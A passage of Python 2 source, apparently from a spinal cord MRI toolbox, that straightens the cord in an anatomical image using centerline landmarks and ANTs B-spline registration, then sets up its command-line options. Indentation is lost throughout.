z_centerline_fit = asarray(z_centerline_fit)
elif algo_fitting == 'nurbs':
from msct_smooth import b_spline_nurbs
x_centerline_fit, y_centerline_fit, z_centerline_fit, x_centerline_deriv, y_centerline_deriv, z_centerline_deriv = b_spline_nurbs(x_centerline, y_centerline, z_centerline, nbControl=None, verbose=verbose)
else:
sct.printv('ERROR: wrong algorithm for fitting',1,'error')
return x_centerline_fit, y_centerline_fit, z_centerline_fit, x_centerline_deriv, y_centerline_deriv, z_centerline_deriv
class SpinalCordStraightener(object):
def __init__(self, input_filename, centerline_filename, debug=0, deg_poly=10, gapxy=20, gapz=15, padding=30, interpolation_warp='spline', rm_tmp_files=1, verbose=1, algo_fitting='hanning', type_window='hanning', window_length=50, crop=1, output_filename=''):
self.input_filename = input_filename
self.centerline_filename = centerline_filename
self.output_filename = output_filename
self.debug = debug
self.deg_poly = deg_poly # maximum degree of polynomial function for fitting centerline.
self.gapxy = gapxy # size of cross in x and y direction for the landmarks
self.gapz = gapz # gap between landmarks along z voxels
self.padding = padding # pad input volume in order to deal with the fact that some landmarks might be outside the FOV due to the curvature of the spinal cord
self.interpolation_warp = interpolation_warp
self.remove_temp_files = rm_tmp_files # remove temporary files
self.verbose = verbose
self.algo_fitting = algo_fitting # 'hanning' or 'nurbs'
self.type_window = type_window # !! for more choices, edit msct_smooth. Possibilities: 'flat', 'hanning', 'hamming', 'bartlett', 'blackman'
self.window_length = window_length
self.crop = crop
self.cpu_number = None
self.bspline_meshsize = '5x5x10'
self.bspline_numberOfLevels = '3'
self.bspline_order = '2'
self.algo_landmark_rigid = 'translation-xy'
self.all_labels = 1
self.use_continuous_labels = 1
self.mse_straightening = 0.0
self.max_distance_straightening = 0.0
def worker_landmarks_curved(self, arguments):
try:
iz = arguments[0]
iz_curved, x_centerline_deriv, y_centerline_deriv, z_centerline_deriv, x_centerline_fit, y_centerline_fit, z_centerline = arguments[1]
temp_results = []
if iz in iz_curved:
# calculate d (ax+by+cz+d=0)
a = x_centerline_deriv[iz]
b = y_centerline_deriv[iz]
c = z_centerline_deriv[iz]
x = x_centerline_fit[iz]
y = y_centerline_fit[iz]
z = z_centerline[iz]
d = -(a * x + b * y + c * z)
# print a,b,c,d,x,y,z
# set coordinates for landmark at the center of the cross
coord = Coordinate([0, 0, 0, 0])
coord.x, coord.y, coord.z = x_centerline_fit[iz], y_centerline_fit[iz], z_centerline[iz]
temp_results.append(coord)
# set y coordinate to y_centerline_fit[iz] for elements 1 and 2 of the cross
cross_coordinates = [Coordinate(), Coordinate(), Coordinate(), Coordinate()]
cross_coordinates[0].y = y_centerline_fit[iz]
cross_coordinates[1].y = y_centerline_fit[iz]
# set x and z coordinates for landmarks +x and -x, forcing de landmark to be in the orthogonal plan and the distance landmark/curve to be gapxy
x_n = Symbol('x_n')
cross_coordinates[1].x, cross_coordinates[0].x = solve(
(x_n - x) ** 2 + ((-1 / c) * (a * x_n + b * y + d) - z) ** 2 - self.gapxy ** 2, x_n) # x for -x and +x
cross_coordinates[0].z = (-1 / c) * (a * cross_coordinates[0].x + b * y + d) # z for +x
cross_coordinates[1].z = (-1 / c) * (a * cross_coordinates[1].x + b * y + d) # z for -x
# set x coordinate to x_centerline_fit[iz] for elements 3 and 4 of the cross
cross_coordinates[2].x = x_centerline_fit[iz]
cross_coordinates[3].x = x_centerline_fit[iz]
# set coordinates for landmarks +y and -y. Here, x coordinate is 0 (already initialized).
y_n = Symbol('y_n')
cross_coordinates[3].y, cross_coordinates[2].y = solve(
(y_n - y) ** 2 + ((-1 / c) * (a * x + b * y_n + d) - z) ** 2 - self.gapxy ** 2, y_n) # y for -y and +y
cross_coordinates[2].z = (-1 / c) * (a * x + b * cross_coordinates[2].y + d) # z for +y
cross_coordinates[3].z = (-1 / c) * (a * x + b * cross_coordinates[3].y + d) # z for -y
for coord in cross_coordinates:
temp_results.append(coord)
else:
if self.all_labels >= 1:
temp_results.append(
Coordinate([x_centerline_fit[iz], y_centerline_fit[iz], z_centerline[iz], 0], mode='continuous'))
return iz, temp_results
except KeyboardInterrupt:
return
def worker_landmarks_curved_results(self, results):
sorted(results, key=lambda l: l[0])
self.results_landmarks_curved = []
landmark_curved_value = 0
for iz, l_curved in results:
for landmark in l_curved:
landmark.value = landmark_curved_value
self.results_landmarks_curved.append(landmark)
landmark_curved_value += 1
def straighten(self):
# Initialization
fname_anat = self.input_filename
fname_centerline = self.centerline_filename
fname_output = self.output_filename
gapxy = self.gapxy
gapz = self.gapz
padding = self.padding
remove_temp_files = self.remove_temp_files
verbose = self.verbose
interpolation_warp = self.interpolation_warp
algo_fitting = self.algo_fitting
window_length = self.window_length
type_window = self.type_window
crop = self.crop
# start timer
start_time = time.time()
# get path of the toolbox
status, path_sct = commands.getstatusoutput('echo $SCT_DIR')
sct.printv(path_sct, verbose)
if self.debug == 1:
print '\n*** WARNING: DEBUG MODE ON ***\n'
fname_anat = '/Users/julien/data/temp/sct_example_data/t2/tmp.150401221259/anat_rpi.nii' #path_sct+'/testing/sct_testing_data/data/t2/t2.nii.gz'
fname_centerline = '/Users/julien/data/temp/sct_example_data/t2/tmp.150401221259/centerline_rpi.nii' # path_sct+'/testing/sct_testing_data/data/t2/t2_seg.nii.gz'
remove_temp_files = 0
type_window = 'hanning'
verbose = 2
# check existence of input files
sct.check_file_exist(fname_anat, verbose)
sct.check_file_exist(fname_centerline, verbose)
# Display arguments
sct.printv('\nCheck input arguments...', verbose)
sct.printv(' Input volume ...................... '+fname_anat, verbose)
sct.printv(' Centerline ........................ '+fname_centerline, verbose)
sct.printv(' Final interpolation ............... '+interpolation_warp, verbose)
sct.printv(' Verbose ........................... '+str(verbose), verbose)
sct.printv('', verbose)
# Extract path/file/extension
path_anat, file_anat, ext_anat = sct.extract_fname(fname_anat)
path_centerline, file_centerline, ext_centerline = sct.extract_fname(fname_centerline)
# create temporary folder
path_tmp = 'tmp.'+time.strftime("%y%m%d%H%M%S")
sct.run('mkdir '+path_tmp, verbose)
# copy files into tmp folder
sct.run('cp '+fname_anat+' '+path_tmp, verbose)
sct.run('cp '+fname_centerline+' '+path_tmp, verbose)
# go to tmp folder
os.chdir(path_tmp)
try:
# Change orientation of the input centerline into RPI
sct.printv('\nOrient centerline to RPI orientation...', verbose)
fname_centerline_orient = file_centerline+'_rpi.nii.gz'
set_orientation(file_centerline+ext_centerline, 'RPI', fname_centerline_orient)
# Get dimension
sct.printv('\nGet dimensions...', verbose)
nx, ny, nz, nt, px, py, pz, pt = sct.get_dimension(fname_centerline_orient)
sct.printv('.. matrix size: '+str(nx)+' x '+str(ny)+' x '+str(nz), verbose)
sct.printv('.. voxel size: '+str(px)+'mm x '+str(py)+'mm x '+str(pz)+'mm', verbose)
# smooth centerline
x_centerline_fit, y_centerline_fit, z_centerline, x_centerline_deriv, y_centerline_deriv, z_centerline_deriv = smooth_centerline(fname_centerline_orient, algo_fitting=algo_fitting, type_window=type_window, window_length=window_length,verbose=verbose)
# Get coordinates of landmarks along curved centerline
#==========================================================================================
sct.printv('\nGet coordinates of landmarks along curved centerline...', verbose)
# landmarks are created along the curved centerline every z=gapz. They consist of a "cross" of size gapx and gapy. In voxel space!!!
# find z indices along centerline given a specific gap: iz_curved
nz_nonz = len(z_centerline)
nb_landmark = int(round(float(nz_nonz)/gapz))
if nb_landmark == 0:
nb_landmark = 1
if nb_landmark == 1:
iz_curved = [0]
else:
iz_curved = [i*gapz for i in range(0, nb_landmark - 1)]
iz_curved.append(nz_nonz-1)
#print iz_curved, len(iz_curved)
n_iz_curved = len(iz_curved)
#print n_iz_curved
# landmark_curved initialisation
# landmark_curved = [ [ [ 0 for i in range(0, 3)] for i in range(0, 5) ] for i in iz_curved ]
landmark_curved = []
### TODO: THIS PART IS SLOW AND CAN BE MADE FASTER
### >>=====================================================================================================
worker_arguments = (iz_curved, x_centerline_deriv, y_centerline_deriv, z_centerline_deriv, x_centerline_fit, y_centerline_fit, z_centerline)
if self.cpu_number != 0:
from multiprocessing import Pool
arguments_landmarks = [(iz, worker_arguments) for iz in range(min(iz_curved), max(iz_curved) + 1, 1)]
pool = Pool(processes=self.cpu_number)
pool.map_async(self.worker_landmarks_curved, arguments_landmarks, callback=self.worker_landmarks_curved_results)
pool.close()
try:
pool.join() # waiting for all the jobs to be done
if self.results_landmarks_curved:
landmark_curved = self.results_landmarks_curved
else:
raise ValueError('ERROR: no curved landmarks constructed...')
except KeyboardInterrupt:
print "\nWarning: Caught KeyboardInterrupt, terminating workers"
pool.terminate()
sys.exit(2)
except Exception as e:
print 'Error during straightening on line {}'.format(sys.exc_info()[-1].tb_lineno)
print e
sys.exit(2)
else:
landmark_curved_temp = [self.worker_landmarks_curved((iz, worker_arguments)) for iz in range(min(iz_curved), max(iz_curved) + 1, 1)]
landmark_curved_value = 0
for iz, l_curved in landmark_curved_temp:
for landmark in l_curved:
landmark.value = landmark_curved_value
landmark_curved.append(landmark)
landmark_curved_value += 1
# Get coordinates of landmarks along straight centerline
#==========================================================================================
sct.printv('\nGet coordinates of landmarks along straight centerline...', verbose)
# landmark_straight = [ [ [ 0 for i in range(0,3)] for i in range (0,5) ] for i in iz_curved ] # same structure as landmark_curved
landmark_straight = []
# calculate the z indices corresponding to the Euclidean distance between two consecutive points on the curved centerline (approximation curve --> line)
# TODO: DO NOT APPROXIMATE CURVE --> LINE
if nb_landmark == 1:
iz_straight = [0 for i in range(0, nb_landmark+1)]
else:
iz_straight = [0 for i in range(0, nb_landmark)]
# print iz_straight,len(iz_straight)
iz_straight[0] = iz_curved[0]
for index in range(1, n_iz_curved, 1):
# compute vector between two consecutive points on the curved centerline
vector_centerline = [x_centerline_fit[iz_curved[index]] - x_centerline_fit[iz_curved[index-1]], \
y_centerline_fit[iz_curved[index]] - y_centerline_fit[iz_curved[index-1]], \
z_centerline[iz_curved[index]] - z_centerline[iz_curved[index-1]] ]
# compute norm of this vector
norm_vector_centerline = linalg.norm(vector_centerline, ord=2)
# round to closest integer value
norm_vector_centerline_rounded = int(round(norm_vector_centerline, 0))
# assign this value to the current z-coordinate on the straight centerline
iz_straight[index] = iz_straight[index-1] + norm_vector_centerline_rounded
# initialize x0 and y0 to be at the center of the FOV
x0 = int(round(nx/2))
y0 = int(round(ny/2))
landmark_curved_value = 1
for iz in range(min(iz_curved), max(iz_curved)+1, 1):
if iz in iz_curved:
index = iz_curved.index(iz)
# set coordinates for landmark at the center of the cross
landmark_straight.append(Coordinate([x0, y0, iz_straight[index], landmark_curved_value]))
# set x, y and z coordinates for landmarks +x
landmark_straight.append(Coordinate([x0 + gapxy, y0, iz_straight[index], landmark_curved_value+1]))
# set x, y and z coordinates for landmarks -x
landmark_straight.append(Coordinate([x0 - gapxy, y0, iz_straight[index], landmark_curved_value+2]))
# set x, y and z coordinates for landmarks +y
landmark_straight.append(Coordinate([x0, y0 + gapxy, iz_straight[index], landmark_curved_value+3]))
# set x, y and z coordinates for landmarks -y
landmark_straight.append(Coordinate([x0, y0 - gapxy, iz_straight[index], landmark_curved_value+4]))
landmark_curved_value += 5
else:
if self.all_labels >= 1:
landmark_straight.append(Coordinate([x0, y0, iz, landmark_curved_value]))
landmark_curved_value += 1
# Create NIFTI volumes with landmarks
#==========================================================================================
# Pad input volume to deal with the fact that some landmarks on the curved centerline might be outside the FOV
# N.B. IT IS VERY IMPORTANT TO PAD ALSO ALONG X and Y, OTHERWISE SOME LANDMARKS MIGHT GET OUT OF THE FOV!!!
#sct.run('fslview ' + fname_centerline_orient)
sct.printv('\nPad input volume to account for landmarks that fall outside the FOV...', verbose)
sct.run('isct_c3d '+fname_centerline_orient+' -pad '+str(padding)+'x'+str(padding)+'x'+str(padding)+'vox '+str(padding)+'x'+str(padding)+'x'+str(padding)+'vox 0 -o tmp.centerline_pad.nii.gz', verbose)
# Open padded centerline for reading
sct.printv('\nOpen padded centerline for reading...', verbose)
file = load('tmp.centerline_pad.nii.gz')
data = file.get_data()
hdr = file.get_header()
landmark_curved_rigid = []
if self.algo_landmark_rigid is not None and self.algo_landmark_rigid != 'None':
# Reorganize landmarks
points_fixed, points_moving = [], []
for coord in landmark_straight:
points_fixed.append([coord.x, coord.y, coord.z])
for coord in landmark_curved:
points_moving.append([coord.x, coord.y, coord.z])
# Register curved landmarks on straight landmarks based on python implementation
sct.printv('\nComputing rigid transformation (algo='+self.algo_landmark_rigid+') ...', verbose)
import msct_register_landmarks
(rotation_matrix, translation_array, points_moving_reg) = msct_register_landmarks.getRigidTransformFromLandmarks(
points_fixed, points_moving, constraints=self.algo_landmark_rigid, show=False)
# reorganize registered pointsx
for index_curved, ind in enumerate(range(0, len(points_moving_reg), 1)):
coord = Coordinate()
coord.x, coord.y, coord.z, coord.value = points_moving_reg[ind][0], points_moving_reg[ind][1], points_moving_reg[ind][2], index_curved+1
landmark_curved_rigid.append(coord)
# Create volumes containing curved and straight landmarks
data_curved_landmarks = data * 0
data_curved_rigid_landmarks = data * 0
data_straight_landmarks = data * 0
# Loop across cross index
for index in range(0, len(landmark_curved_rigid)):
x, y, z = int(round(landmark_curved[index].x)), \
int(round(landmark_curved[index].y)), \
int(round(landmark_curved[index].z))
# attribute landmark_value to the voxel and its neighbours
data_curved_landmarks[x + padding - 1:x + padding + 2, y + padding - 1:y + padding + 2,
z + padding - 1:z + padding + 2] = landmark_curved[index].value
# get x, y and z coordinates of curved landmark (rounded to closest integer)
x, y, z = int(round(landmark_curved_rigid[index].x)), \
int(round(landmark_curved_rigid[index].y)), \
int(round(landmark_curved_rigid[index].z))
# attribute landmark_value to the voxel and its neighbours
data_curved_rigid_landmarks[x + padding - 1:x + padding + 2, y + padding - 1:y + padding + 2,
z + padding - 1:z + padding + 2] = landmark_curved_rigid[index].value
# get x, y and z coordinates of straight landmark (rounded to closest integer)
x, y, z = int(round(landmark_straight[index].x)), \
int(round(landmark_straight[index].y)), \
int(round(landmark_straight[index].z))
# attribute landmark_value to the voxel and its neighbours
data_straight_landmarks[x + padding - 1:x + padding + 2, y + padding - 1:y + padding + 2,
z + padding - 1:z + padding + 2] = landmark_straight[index].value
# Write NIFTI volumes
sct.printv('\nWrite NIFTI volumes...', verbose)
hdr.set_data_dtype('uint32') # set imagetype to uint8 #TODO: maybe use int32
img = Nifti1Image(data_curved_landmarks, None, hdr)
save(img, 'tmp.landmarks_curved.nii.gz')
sct.printv('.. File created: tmp.landmarks_curved.nii.gz', verbose)
hdr.set_data_dtype('uint32') # set imagetype to uint8 #TODO: maybe use int32
img = Nifti1Image(data_curved_rigid_landmarks, None, hdr)
save(img, 'tmp.landmarks_curved_rigid.nii.gz')
sct.printv('.. File created: tmp.landmarks_curved_rigid.nii.gz', verbose)
img = Nifti1Image(data_straight_landmarks, None, hdr)
save(img, 'tmp.landmarks_straight.nii.gz')
sct.printv('.. File created: tmp.landmarks_straight.nii.gz', verbose)
# writing rigid transformation file
text_file = open("tmp.curve2straight_rigid.txt", "w")
text_file.write("#Insight Transform File V1.0\n")
text_file.write("#Transform 0\n")
text_file.write("Transform: AffineTransform_double_3_3\n")
text_file.write("Parameters: %.9f %.9f %.9f %.9f %.9f %.9f %.9f %.9f %.9f %.9f %.9f %.9f\n" % (
rotation_matrix[0, 0], rotation_matrix[0, 1], rotation_matrix[0, 2], rotation_matrix[1, 0],
rotation_matrix[1, 1], rotation_matrix[1, 2], rotation_matrix[2, 0], rotation_matrix[2, 1],
rotation_matrix[2, 2], -translation_array[0, 0], translation_array[0, 1],
-translation_array[0, 2]))
text_file.write("FixedParameters: 0 0 0\n")
text_file.close()
else:
# Create volumes containing curved and straight landmarks
data_curved_landmarks = data * 0
data_straight_landmarks = data * 0
# Loop across cross index
for index in range(0, len(landmark_curved)):
x, y, z = int(round(landmark_curved[index].x)), \
int(round(landmark_curved[index].y)), \
int(round(landmark_curved[index].z))
# attribute landmark_value to the voxel and its neighbours
data_curved_landmarks[x + padding - 1:x + padding + 2, y + padding - 1:y + padding + 2,
z + padding - 1:z + padding + 2] = landmark_curved[index].value
# get x, y and z coordinates of straight landmark (rounded to closest integer)
x, y, z = int(round(landmark_straight[index].x)), \
int(round(landmark_straight[index].y)), \
int(round(landmark_straight[index].z))
# attribute landmark_value to the voxel and its neighbours
data_straight_landmarks[x + padding - 1:x + padding + 2, y + padding - 1:y + padding + 2,
z + padding - 1:z + padding + 2] = landmark_straight[index].value
# Write NIFTI volumes
sct.printv('\nWrite NIFTI volumes...', verbose)
hdr.set_data_dtype('uint32') # set imagetype to uint8 #TODO: maybe use int32
img = Nifti1Image(data_curved_landmarks, None, hdr)
save(img, 'tmp.landmarks_curved.nii.gz')
sct.printv('.. File created: tmp.landmarks_curved.nii.gz', verbose)
img = Nifti1Image(data_straight_landmarks, None, hdr)
save(img, 'tmp.landmarks_straight.nii.gz')
sct.printv('.. File created: tmp.landmarks_straight.nii.gz', verbose)
# Estimate deformation field by pairing landmarks
#==========================================================================================
# convert landmarks to INT
sct.printv('\nConvert landmarks to INT...', verbose)
sct.run('isct_c3d tmp.landmarks_straight.nii.gz -type int -o tmp.landmarks_straight.nii.gz', verbose)
sct.run('isct_c3d tmp.landmarks_curved.nii.gz -type int -o tmp.landmarks_curved.nii.gz', verbose)
# This stands to avoid overlapping between landmarks
# TODO: do symmetric removal
sct.printv('\nMake sure all labels between landmark_straight and landmark_curved match 1...', verbose)
label_process_straight = ProcessLabels(fname_label="tmp.landmarks_straight.nii.gz",
fname_output=["tmp.landmarks_straight.nii.gz", "tmp.landmarks_curved.nii.gz"],
fname_ref="tmp.landmarks_curved.nii.gz", verbose=verbose)
label_process_straight.process('remove-symm')
# Estimate rigid transformation
sct.printv('\nEstimate rigid transformation between paired landmarks...', verbose)
sct.run('isct_ANTSUseLandmarkImagesToGetAffineTransform tmp.landmarks_straight.nii.gz tmp.landmarks_curved.nii.gz rigid tmp.curve2straight_rigid.txt', verbose)
# Apply rigid transformation
sct.printv('\nApply rigid transformation to curved landmarks...', verbose)
#sct.run('sct_apply_transfo -i tmp.landmarks_curved.nii.gz -o tmp.landmarks_curved_rigid.nii.gz -d tmp.landmarks_straight.nii.gz -w tmp.curve2straight_rigid.txt -x nn', verbose)
Transform(input_filename="tmp.landmarks_curved.nii.gz", source_reg="tmp.landmarks_curved_rigid.nii.gz", output_filename="tmp.landmarks_straight.nii.gz", warp="tmp.curve2straight_rigid.txt", interp="nn", verbose=verbose).apply()
if verbose == 2:
from mpl_toolkits.mplot3d import Axes3D
import matplotlib.pyplot as plt
fig = plt.figure()
ax = Axes3D(fig)
ax.plot(x_centerline_fit, y_centerline_fit, z_centerline, zdir='z')
ax.plot([coord.x for coord in landmark_curved],
[coord.y for coord in landmark_curved],
[coord.z for coord in landmark_curved], '.')
ax.plot([coord.x for coord in landmark_straight],
[coord.y for coord in landmark_straight],
[coord.z for coord in landmark_straight], 'r.')
if self.algo_landmark_rigid is not None and self.algo_landmark_rigid != 'None':
ax.plot([coord.x for coord in landmark_curved_rigid],
[coord.y for coord in landmark_curved_rigid],
[coord.z for coord in landmark_curved_rigid], 'b.')
ax.set_xlabel('x')
ax.set_ylabel('y')
ax.set_zlabel('z')
plt.show()
if (self.use_continuous_labels == 1 and self.algo_landmark_rigid is not None and self.algo_landmark_rigid != "None") or self.use_continuous_labels=='1':
landmark_curved_rigid, landmark_straight = ProcessLabels.remove_label_coord(landmark_curved_rigid, landmark_straight, symmetry=True)
# Writting landmark curve in text file
landmark_straight_file = open("LandmarksRealStraight.txt", "w+")
for i in landmark_straight:
landmark_straight_file.write(
str(i.x + padding) + "," + str(i.y + padding) + "," + str(i.z + padding) + "\n")
landmark_straight_file.close()
# Writting landmark curve in text file
landmark_curved_file = open("LandmarksRealCurve.txt", "w+")
for i in landmark_curved_rigid:
landmark_curved_file.write(
str(i.x + padding) + "," + str(i.y + padding) + "," + str(i.z + padding) + "\n")
landmark_curved_file.close()
# Estimate b-spline transformation curve --> straight
sct.printv('\nEstimate b-spline transformation: curve --> straight...', verbose)
sct.run('isct_ANTSUseLandmarkImagesWithTextFileToGetBSplineDisplacementField tmp.landmarks_straight.nii.gz tmp.landmarks_curved_rigid.nii.gz tmp.warp_curve2straight.nii.gz '+self.bspline_meshsize+' '+self.bspline_numberOfLevels+' LandmarksRealCurve.txt LandmarksRealStraight.txt '+self.bspline_order+' 0', verbose)
else:
# This stands to avoid overlapping between landmarks
sct.printv('\nMake sure all labels between landmark_straight and landmark_curved match 2...', verbose)
label_process = ProcessLabels(fname_label="tmp.landmarks_curved_rigid.nii.gz",
fname_output=["tmp.landmarks_curved_rigid.nii.gz", "tmp.landmarks_straight.nii.gz"],
fname_ref="tmp.landmarks_straight.nii.gz", verbose=verbose)
label_process.process('remove-symm')
# Estimate b-spline transformation curve --> straight
sct.printv('\nEstimate b-spline transformation: curve --> straight...', verbose)
sct.run('isct_ANTSUseLandmarkImagesToGetBSplineDisplacementField tmp.landmarks_straight.nii.gz tmp.landmarks_curved_rigid.nii.gz tmp.warp_curve2straight.nii.gz '+self.bspline_meshsize+' '+self.bspline_numberOfLevels+' '+self.bspline_order+' 0', verbose)
# remove padding for straight labels
if crop == 1:
ImageCropper(input_file="tmp.landmarks_straight.nii.gz", output_file="tmp.landmarks_straight_crop.nii.gz", dim="0,1,2", bmax=True, verbose=verbose).crop()
pass
else:
sct.run('cp tmp.landmarks_straight.nii.gz tmp.landmarks_straight_crop.nii.gz', verbose)
# Concatenate rigid and non-linear transformations...
sct.printv('\nConcatenate rigid and non-linear transformations...', verbose)
#sct.run('isct_ComposeMultiTransform 3 tmp.warp_rigid.nii -R tmp.landmarks_straight.nii tmp.warp.nii tmp.curve2straight_rigid.txt')
# !!! DO NOT USE sct.run HERE BECAUSE isct_ComposeMultiTransform OUTPUTS A NON-NULL STATUS !!!
cmd = 'isct_ComposeMultiTransform 3 tmp.curve2straight.nii.gz -R tmp.landmarks_straight_crop.nii.gz tmp.warp_curve2straight.nii.gz tmp.curve2straight_rigid.txt'
sct.printv(cmd, verbose, 'code')
sct.run(cmd, self.verbose)
#commands.getstatusoutput(cmd)
# Estimate b-spline transformation straight --> curve
# TODO: invert warping field instead of estimating a new one
sct.printv('\nEstimate b-spline transformation: straight --> curve...', verbose)
if (self.use_continuous_labels==1 and self.algo_landmark_rigid is not None and self.algo_landmark_rigid != "None") or self.use_continuous_labels=='1':
sct.run('isct_ANTSUseLandmarkImagesWithTextFileToGetBSplineDisplacementField tmp.landmarks_curved_rigid.nii.gz tmp.landmarks_straight.nii.gz tmp.warp_straight2curve.nii.gz '+self.bspline_meshsize+' '+self.bspline_numberOfLevels+' LandmarksRealCurve.txt LandmarksRealStraight.txt '+self.bspline_order+' 0', verbose)
else:
sct.run('isct_ANTSUseLandmarkImagesToGetBSplineDisplacementField tmp.landmarks_curved_rigid.nii.gz tmp.landmarks_straight.nii.gz tmp.warp_straight2curve.nii.gz '+self.bspline_meshsize+' '+self.bspline_numberOfLevels+' '+self.bspline_order+' 0', verbose)
# Concatenate rigid and non-linear transformations...
sct.printv('\nConcatenate rigid and non-linear transformations...', verbose)
cmd = 'isct_ComposeMultiTransform 3 tmp.straight2curve.nii.gz -R '+file_anat+ext_anat+' -i tmp.curve2straight_rigid.txt tmp.warp_straight2curve.nii.gz'
sct.printv(cmd, verbose, 'code')
#commands.getstatusoutput(cmd)
sct.run(cmd, self.verbose)
# Apply transformation to input image
sct.printv('\nApply transformation to input image...', verbose)
Transform(input_filename=str(file_anat+ext_anat), source_reg="tmp.anat_rigid_warp.nii.gz", output_filename="tmp.landmarks_straight_crop.nii.gz", interp=interpolation_warp, warp="tmp.curve2straight.nii.gz", verbose=verbose).apply()
# compute the error between the straightened centerline/segmentation and the central vertical line.
# Ideally, the error should be zero.
# Apply deformation to input image
sct.printv('\nApply transformation to centerline image...', verbose)
# sct.run('sct_apply_transfo -i '+fname_centerline_orient+' -o tmp.centerline_straight.nii.gz -d tmp.landmarks_straight_crop.nii.gz -x nn -w tmp.curve2straight.nii.gz')
Transform(input_filename=fname_centerline_orient, source_reg="tmp.centerline_straight.nii.gz", output_filename="tmp.landmarks_straight_crop.nii.gz", interp="nn", warp="tmp.curve2straight.nii.gz", verbose=verbose).apply()
#c = sct.run('sct_crop_image -i tmp.centerline_straight.nii.gz -o tmp.centerline_straight_crop.nii.gz -dim 2 -bzmax')
from msct_image import Image
file_centerline_straight = Image('tmp.centerline_straight.nii.gz', verbose=verbose)
coordinates_centerline = file_centerline_straight.getNonZeroCoordinates(sorting='z')
mean_coord = []
from numpy import mean
for z in range(coordinates_centerline[0].z, coordinates_centerline[-1].z):
temp_mean = [coord.value for coord in coordinates_centerline if coord.z == z]
if temp_mean:
mean_value = mean(temp_mean)
mean_coord.append(mean([[coord.x * coord.value / mean_value, coord.y * coord.value / mean_value] for coord in coordinates_centerline if coord.z == z], axis=0))
# compute error between the input data and the nurbs
from math import sqrt
x0 = file_centerline_straight.data.shape[0]/2.0
y0 = file_centerline_straight.data.shape[1]/2.0
count_mean = 0
for coord_z in mean_coord:
if not isnan(sum(coord_z)):
dist = ((x0-coord_z[0])*px)**2 + ((y0-coord_z[1])*py)**2
self.mse_straightening += dist
dist = sqrt(dist)
if dist > self.max_distance_straightening:
self.max_distance_straightening = dist
count_mean += 1
self.mse_straightening = sqrt(self.mse_straightening/float(count_mean))
except Exception as e:
sct.printv('WARNING: Exception during Straightening:', 1, 'warning')
print 'Error on line {}'.format(sys.exc_info()[-1].tb_lineno)
print e
os.chdir('..')
# Generate output file (in current folder)
# TODO: do not uncompress the warping field, it is too time consuming!
sct.printv('\nGenerate output file (in current folder)...', verbose)
sct.generate_output_file(path_tmp+'/tmp.curve2straight.nii.gz', 'warp_curve2straight.nii.gz', verbose) # warping field
sct.generate_output_file(path_tmp+'/tmp.straight2curve.nii.gz', 'warp_straight2curve.nii.gz', verbose) # warping field
if fname_output == '':
fname_straight = sct.generate_output_file(path_tmp+'/tmp.anat_rigid_warp.nii.gz', file_anat+'_straight'+ext_anat, verbose) # straightened anatomic
else:
fname_straight = sct.generate_output_file(path_tmp+'/tmp.anat_rigid_warp.nii.gz', fname_output, verbose) # straightened anatomic
# Remove temporary files
if remove_temp_files:
sct.printv('\nRemove temporary files...', verbose)
sct.run('rm -rf '+path_tmp, verbose)
sct.printv('\nDone!\n', verbose)
sct.printv('Maximum x-y error = '+str(round(self.max_distance_straightening,2))+' mm', verbose, 'bold')
sct.printv('Accuracy of straightening (MSE) = '+str(round(self.mse_straightening,2))+' mm', verbose, 'bold')
# display elapsed time
elapsed_time = time.time() - start_time
sct.printv('\nFinished! Elapsed time: '+str(int(round(elapsed_time)))+'s', verbose)
sct.printv('\nTo view results, type:', verbose)
sct.printv('fslview '+fname_straight+' &\n', verbose, 'info')
if __name__ == "__main__":
# Initialize parser
parser = Parser(__file__)
#Mandatory arguments
parser.usage.set_description("This program takes as input an anatomic image and the centerline or segmentation of its spinal cord (that you can get using sct_get_centerline.py or sct_segmentation_propagation) and returns the anatomic image where the spinal cord was straightened.")
parser.add_option(name="-i",
type_value="image_nifti",
description="input image.",
mandatory=True,
example="t2.nii.gz")
parser.add_option(name="-c",
type_value="image_nifti",
description="centerline or segmentation.",
mandatory=True,
example="centerline.nii.gz")
parser.add_option(name="-p",
type_value="int",
description="amount of padding for generating labels.",
mandatory=False,
example="30",
default_value=30)
parser.add_option(name="-o",
type_value="file_output",
description="output file",
mandatory=False,
default_value='',
example="out.nii.gz")
parser.add_option(name="-x",
type_value="multiple_choice",
description="Final interpolation.",
mandatory=False,
example=["nn", "linear", "spline"],
default_value="spline")
parser.add_option(name="-r",
type_value="multiple_choice",
description="remove temporary files.",
mandatory=False,
example=['0', '1'],
default_value='1')
parser.add_option(name="-a",
type_value="multiple_choice",
description="Algorithm for curve fitting.",
mandatory=False,
example=["hanning", "nurbs"],
default_value="hanning")
parser.add_option(name="-f",
type_value="multiple_choice",
description="Crop option. 0: no crop, 1: crop around landmarks.",
mandatory=False,
example=['0', '1'],
default_value=1)
parser.add_option(name="-v",
type_value="multiple_choice",
description="Verbose. 0: nothing, 1: basic, 2: extended.",
mandatory=False,
example=['0', '1', '2'],
default_value=1)
parser.add_option(name="-params",
type_value=[[','], 'str'],
description="""Parameters for spinal cord straightening. Separate arguments with ",".\nuse_continuous_labels : 0,1. Default = False\nalgo_fitting: {hanning,nurbs} algorithm for curve fitting. Default=hanning\nbspline_meshsize: <int>x<int>x<int> size of mesh for B-Spline registration. Default=5x5x10\nbspline_numberOfLevels: <int> number of levels for BSpline interpolation. Default=3\nbspline_order: <int> Order of BSpline for interpolation. Default=2\nalgo_landmark_rigid {rigid,xy,translation,translation-xy,rotation,rotation-xy} constraints on landmark-based rigid pre-registration""",
mandatory=False,
example="algo_fitting=nurbs,bspline_meshsize=5x5x12,algo_landmark_rigid=xy")
parser.add_option(name="-cpu-nb",
type_value="int",
description="Number of CPU used for straightening. 0: no multiprocessing. If not provided, it uses all the available cores.",
mandatory=False,
example="8")
arguments = parser.parse(sys.argv[1:])
# assigning variables to arguments
input_filename = arguments["-i"]
centerline_file = arguments["-c"]
sc_straight = SpinalCordStraightener(input_filename, centerline_file)
# Handling optional arguments
if "-r" in arguments:
sc_straight.remove_temp_files = int(arguments["-r"])
if "-p" in arguments:
sc_straight.padding = int(arguments["-p"])
if "-x" in arguments:
sc_straight.interpolation_warp = str(arguments["-x"])
if "-o" in arguments:
sc_straight.output_filename = str(arguments["-o"])
if "-a" in arguments:
sc_straight.algo_fitting = str(arguments["-a"])
if "-f" in arguments:
sc_straight.crop = int(arguments["-f"])
if "-v" in arguments:
sc_straight.verbose = int(arguments["-v"])
if "-cpu-nb" in arguments:
sc_straight.cpu_number = int(arguments["-cpu-nb"])
if "-params" in arguments:
params_user = arguments['-params']
# update registration parameters
for param in params_user:
